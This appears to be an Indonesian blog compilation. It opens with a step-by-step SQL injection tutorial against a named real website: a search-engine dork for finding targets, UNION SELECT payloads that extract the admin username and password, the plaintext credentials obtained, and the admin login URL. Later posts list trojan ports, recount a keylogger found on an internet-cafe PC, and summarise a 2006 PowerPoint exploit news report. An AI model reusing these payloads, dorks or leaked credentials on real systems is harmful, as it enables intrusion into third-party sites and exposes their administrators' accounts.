Gag tau mungkin ini jawaban dari beberapa pertanyaan teman sy yg msh ingin coba-coba
dengan SQL Inject. ya sekedar belajar dan latihan sambil nyari-nyari yg berguna bagi diri sendiri and my big family

Ada banyak artikel di Internet yg memberikan informasi bagaimana cara meng-exploitasi situs-situs yang vulnerability, tp terkadang bagi sebagian orang yg mendapatkannya malah bingung cara penerapannya. hmmm..ini sekedar contoh saja, tp sy berharap tidak dilakukan
untuk kemaksiatan (dosa ditangan anda).

ok kita mulai :

Step 1 :
cari target di Internet dengan menggunakan search engine, masukkan keyword yg tepat misal
inurl:/devami.asp?id= geri

Step 2 :
ketemu korbannya ! sy pilih salah satu korban : http://www.istanbulplanlama.com/vz/devami.asp?id=21

Step 3 :
selanjutnya sy coba untuk membuktikan bahwa url tersebut masih vul or not dengan cara menghapus angka 21-nya. yupz, ternyata saya dapat 1 pesan error seperti ini :

Step 4 :
dari hasil diatas, selanjutnya siapkan kue + teh maniz

Step 5 :

untuk mencari username coba query dibawah ini : -21+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

ganti angka 21 diatas dengan query tersebut, sehingga menjadi :

http://www.istanbulplanlama.com/vz/devami.asp?id=
-21+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin (ditulis sebaris…)

dari query diatas sy dapatkan username nya adalah : istanbul

Step 6 :
jika username sudah dapat, selanjutnya password. input query seperti ini :

-21+union+select+0,sifre,2,3,4,5,6,7+from+admin

contoh :

http://www.istanbulplanlama.com/vz/devami.asp?
id=-21+union+select+0,sifre,2,3,4,5,6,7+from+admin (ditulis sebaris…)

binggo….! passwordnya di dapat : emelsevil96572

Step 7 :
login dengan menggunakan username dan password tersebut dengan cara masuk ke halaman admin : http://www.istanbulplanlama.com/vz/admin/kontrol.asp

Step 8 :
terserah sekarang mau ngapain yg penting, jangan pernah rusakin site punya orang. Ingat dosa !

Step 9 :
pulang shalat tahajud n mboco Qur’an

Catatan :
buat om y***o dan om b*b mudah-mudahan ini jadi step tuk belajar sec networking

Trojan adalah program yang berjalan di dalam komputer kita tanpa kita ketahui secara pasti kehadirannya, dan juga bisa memberikan semacam akses kepada orang lain untuk menggunakan komputer tersebut dari luar (bila menggunakan internet). Walaupun secara teknisnya trojan bukan virus, tapi trojan diidentifikasikan dalam katagori yang sama dari sebuah program malicious (merusak) yang bisa berjalan di dalam komputer tanpa kita ketahui atau pengguna komputer itu sendiri. Ada beberapa tipe dari trojan. Berikut sedikit daftar trojan dan port yg biasa mereka aktifkan:

30 Agent 40421
31 Agent 31, Hackers Paradise, Masters Paradise
41 Deep Throat, Foreplay
48 DRAT
50 DRAT
58 DMSetup
59 DMSetup
79 CDK, Firehotcker
80 711 trojan (Seven Eleven), AckCmd, Back End, Back Orifice 2000
119 Happy99
121 Attack Bot, God Message, JammerKillah
123 Net Controller
133 Farnaz
137 Chode
137 (UDP) - Msinit
138 Chode
139 Chode, God Message worm, Msinit, Netlog, Network, Qaz
142 NetTaxi

Ngerinya!!! biasanya trojan memberikan akses kepada seseorang yang tidak kita kenal untuk menggunakan komputer kita melewati jaringan dimana komputer relasi kita berada, menjalankan program di dalam komputer kita, atau meng-akses data yang ada di dalam hard disk komputer kita. Bahkan untuk ngeformat komputer kitapun bisa.

Bersambung….

Ini merupakan pengalaman berharga setidaknya bagi saya pribadi. Mungkin juga bisa menjadi pelajaran bagi anda yg suka ngenet di warnet. Suatu hari ketika saya mulai sering akses internet dari warnet, karena koneksi yang ada dikantor sering lemot,letih,lesu,lalu,lalang… n sering rebutan bandwith dengan yang laen…Jadilah saya langganan warnet!

Suatu saat, saya merasa jengkel ketika hendak membuka sebuah mail saya ternyata salah password melulu. Perasaan, terakhir kali saya akses mail itu, gak ganti password kok! Akhirnya saya putuskan untuk merelakan mail saya ilang. Sedih rasanya kayak digigit GORILA.Saya sempat berpikir; ada dua kemungkinan. Saya sudah mulai linglung sehingga lupa kalau password mail saya sudah saya ganti atau ada orang yg ngecrack passwords mail saya.

Kemungkinan pertama ternyata enggak sebab saya masih ingat kok ukuran celana mantan pacar saya yg anuuu…:) berarti belom linglung khan.
Nah, kemungkinan kedua, ada yg crack password mail saya. Tapi gimana? Siapa? Akhirnya saya putuskan untuk menyelidiki kejanggalan ini. Saya datangi terus warnet itu (ga’ sah tau warnet mana), komputer yg sama saya booking… hehehe… Pas waktu itu saya ingat sesuatu!!! NETSTAT!!! Kebetulan, warnet itu pakai SO Windows. setelah saya cek! TROJAN, itu jawabannya. Ternyata ada yg merekam semua ketukan keyboard di komputer yg saya pakai saat itu. So pie donk….??? Ya ilang kabeh…preet.

Seattle, Sebuah virus baru mengincar software besutan Microsoft. Virus ini diketahui mengeksploitasi keringkihan di aplikasi presentasi PowerPoint, yang memungkinkan black hacker menyusupi komputer korban.

Terkait hal ini, Microsoft telah mengeluarkan advisory tentang virus tersebut melalui blognya 17 Juli silam. Dipaparkan, virus ini akan beraksi jika pengguna mengirimkan file attachment PowerPoint ke e-mail atau membuka file jahat yang disuguhkan hacker.

Dijelaskan pula, para hacker juga akan membujuk pengguna ke sebuah halaman Web yang menawarkan konten atau iklan berisi file yang mengeskploitasi software PowerPoint. Menurut Microsoft, virus hanya mengeksploitasi keringkihan di PowerPoint 2000, 2002 dan 2003. Demikian dilansir detikINET dari Reuters, Jumat (21/07/2006).

Sekali pengguna terjebak dan membuka file PowerPoint tersebut, maka virus akan menginstal keystroke logging system guna memata-matai apapun yang diketikkan pengguna di komputernya. Virus ini juga memungkinkan hacker menginstal program jahat lainnya di komputer korban.

“Virus ini akan menginstal backdoor dan memungkinkan semua tipe software ter-download ke komputer. Nah, komputer tersebut nantinya bisa dikendalikan secara remote,” tutur Alfred Huger, pakar keamanan Symantec.

Menanggapi hal ini, Microsoft mengatakan akan merampungkan security update alias patch-nya secepat mungkin. Patch-nya sendiri kabarnya akan dirilis 8 Agustus 2006, atau bahkan lebih cepat dari jadwal itu, sebagai bagian dari update keamanan bulanan (monthly security update).